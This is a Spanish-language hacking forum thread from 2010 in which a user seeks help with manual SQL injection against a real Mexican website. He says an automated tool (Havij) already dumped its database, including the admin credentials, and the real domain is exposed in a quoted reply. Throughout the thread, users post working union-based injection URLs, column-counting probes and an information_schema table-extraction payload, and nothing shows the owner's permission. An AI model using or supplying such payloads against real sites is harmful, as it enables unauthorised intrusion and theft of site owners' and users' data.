elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  que me puede estar saliendo mal a la hora de hacer injection sql
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: que me puede estar saliendo mal a la hora de hacer injection sql  (Leído 4,797 veces)
RedZer


Desconectado Desconectado

Mensajes: 666



Ver Perfil
que me puede estar saliendo mal a la hora de hacer injection sql
« en: 26 Diciembre 2010, 05:21 am »

hola amigos miren resulta que hay una web que es vulnerable a injection sql como lo se?? por medio de dos cosas la prime utilize un programa que posteo un usuario la herramienta se llama Havij el cual al poner el url de la pagina en menos de 2 minutos me arojo la bd junto con sus tablas y sus respectivos valores :¬¬ ustedes se preguntaran entonces para que quieres hacerlo manual mente si ya tienes hasta el nombre de usuario y contraseña del sistema  vos ser un lammer :¬¬ para nada amigos yo lo que deceo es aprender no me gusta navegar e ir destruyendo por que se que para montar una web se gasta y encuanto pueda descubrir el fallo  manualmente den lo por echo que lo reportare con el administrador del sitio  bueno miren la url tiene la siguiente estructura

http://www.xxxxx.com.mx/clasificados.php?tipo=10
en el post que publicaron aqui
http://foro.elhacker.net/nivel_web/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.15.html
comentan que para saber siuna web es vulnerable basta con poner una comilla simple despues del numero yo lo puse de esta forma
Código
  1. http://www.xxxxx.com.mx/clasificados.php?tipo=10'
el resultado que me arojo ffue el siguiente
Código
  1. Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/[b]xopin[/b]/public_html/clasificados.php on line 13
entonces segun el tuto es vulnerable  la base de datos de esta web se llama xopin como estoy tan seguro?? por el programa que les mencione arriva bueno hasta ahi voy bien la dificultad comienza cuando deceo contar el numero de columnas lo intente de la siguiente forma
Código
  1. http://www.xxx.com.mx/clasificados.php?tipo=-1 order by 1,2,3,4,5,6,7 ect hasta llegar a 100
  2.  
tambien lo intente asi
Código
  1. http://www.xxx.com.mx/clasificados.php?tipo=-1 order by 1 //iva cambiano el 1 por otro numero hasta llegar a 100
  2.  
y sin resultados aa cabe mencionar que el error del warning siempre estuvo presente no cambio nada siempre estuvo de la siguiente forma
Código
  1. Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/xopin/public_html/clasificados.php on line 13
  2.  
  3.  

intente hacerlo con union y tampoco me sale lo ise de la siguiente forma

Código
  1. http://www.xxxx.com.mx/clasificados.php?tipo=-1+union+all+select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ..ect llegue hasta 100
  2.  
  3.  
de igual forma el error del warning que da igual  , que puede estar pasando? hasta que numero debo de llegar para que me muestre el numero de columnas?
« Última modificación: 26 Diciembre 2010, 05:25 am por RedZer » En línea

Nacido y criado entre gente que enseño a pensar antes de creer a ciegas, Todo me causa curiosidad en el mundo
volteo0101

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: que me puede estar saliendo mal a la hora de hacer injection sql
« Respuesta #1 en: 26 Diciembre 2010, 09:50 am »

hola RedZer , prueba poniendo después de la consulta COMENTARIOS EN MYSQL para dejar sin efecto el resto de la consulta..

ejemplo

www.ejemplo.com.ar/archivo.php?id=-1+union+select+0,1,2,3,4 --

saludos.
En línea

RedZer


Desconectado Desconectado

Mensajes: 666



Ver Perfil
Re: que me puede estar saliendo mal a la hora de hacer injection sql
« Respuesta #2 en: 26 Diciembre 2010, 20:19 pm »

hola volteo0101 lo acabo de hacer asi como dices y me acorde que tambien en un pricipio asi le estaba haciendo ,solo me sigue arojando el mismo error este
Código
  1. Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/xopin/public_html/clasificados.php on line 13
  2.  
  3.  
la url quedo asi
Código
  1. http://www.xxxx.com.mx/clasificados.php?tipo=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--
  2.  
estavez solo llegue hasta 50
« Última modificación: 27 Diciembre 2010, 17:55 pm por RedZer » En línea

Nacido y criado entre gente que enseño a pensar antes de creer a ciegas, Todo me causa curiosidad en el mundo
volteo0101

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: que me puede estar saliendo mal a la hora de hacer injection sql
« Respuesta #3 en: 27 Diciembre 2010, 11:28 am »

hola volteo0101 lo acabo de hacer asi como dices y me acorde que tambien en un pricipio asi le estaba haciendo ,solo me sigue arojando el mismo error este
Código
  1. Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/xopin/public_html/clasificados.php on line 13
  2.  
  3.  
la url quedo asi
Código
  1. http://www.laopinion.com.mx/clasificados.php?tipo=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--
  2.  
estavez solo llegue hasta 50

al parecer no es vulnerable, eso creo .. no me devuelve las columnas.
En línea

RedZer


Desconectado Desconectado

Mensajes: 666



Ver Perfil
Re: que me puede estar saliendo mal a la hora de hacer injection sql
« Respuesta #4 en: 27 Diciembre 2010, 17:55 pm »

shales se me olvido quitar la pagina  :rolleyes: pero bueno confio en ustedes que no le moveran nada si logran vulnerarla, y retomando el tema volteo0101 yo tambien ayer lo intente y no me aroja las columnas lo que no entiendo es por que con el programa si me la vulnera en ese mismo apartado  :o
En línea

Nacido y criado entre gente que enseño a pensar antes de creer a ciegas, Todo me causa curiosidad en el mundo
Once

Desconectado Desconectado

Mensajes: 120


Ver Perfil WWW
Re: que me puede estar saliendo mal a la hora de hacer injection sql
« Respuesta #5 en: 28 Diciembre 2010, 03:39 am »

http://www.xxx.com.mx/clasificados.php?tipo=60+and+1=0+union+select+table_name+from+information_schema.tables--

Saludos.
« Última modificación: 28 Diciembre 2010, 04:02 am por 11Sep » En línea

RedZer


Desconectado Desconectado

Mensajes: 666



Ver Perfil
Re: que me puede estar saliendo mal a la hora de hacer injection sql
« Respuesta #6 en: 28 Diciembre 2010, 03:50 am »

>:( shales bro me isite todo solo me hubieras dado pistas:(:(
En línea

Nacido y criado entre gente que enseño a pensar antes de creer a ciegas, Todo me causa curiosidad en el mundo
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: que me puede estar saliendo mal a la hora de hacer injection sql
« Respuesta #7 en: 28 Diciembre 2010, 03:55 am »

>:( shales bro me isite todo solo me hubieras dado pistas:(:(
le falta bastante a eso , solo saco una tabla
En línea

RedZer


Desconectado Desconectado

Mensajes: 666



Ver Perfil
Re: que me puede estar saliendo mal a la hora de hacer injection sql
« Respuesta #8 en: 28 Diciembre 2010, 03:57 am »

le falta bastante a eso , solo saco una tabla
no escierto camarada saca todas son las mismas que saca con el programa
En línea

Nacido y criado entre gente que enseño a pensar antes de creer a ciegas, Todo me causa curiosidad en el mundo
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: que me puede estar saliendo mal a la hora de hacer injection sql
« Respuesta #9 en: 28 Diciembre 2010, 04:06 am »

bueno como vos digas
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ya se que deben estar podridos // Vb injection
Programación Visual Basic
GrTk 1 1,476 Último mensaje 13 Septiembre 2006, 05:05 am
por WarGhost
no entiendo este error en asm con gcc, que puede estar mal?
Programación C/C++
Belial & Grimoire 2 3,003 Último mensaje 17 Mayo 2010, 11:33 am
por Foxy Rider
Que puede estar fallando? (C)
Programación C/C++
Saberuneko 7 4,525 Último mensaje 10 Marzo 2011, 10:21 am
por Akai
Es posible hacer que el pc se prenda a cierta hora?
Java
klaine 6 4,324 Último mensaje 14 Diciembre 2011, 10:59 am
por Norlak
sql injection se puede?
Hacking
fvpg 1 1,896 Último mensaje 25 Mayo 2018, 05:57 am
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines